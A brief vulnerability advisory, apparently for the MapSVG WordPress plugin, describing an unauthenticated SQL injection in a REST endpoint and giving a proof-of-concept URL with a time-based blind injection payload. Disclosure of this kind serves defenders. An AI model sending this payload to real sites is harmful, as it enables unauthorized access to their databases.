The plugin does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users.
https://example.com/wp-json/mapsvg/v1/maps/2?id=1' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)–+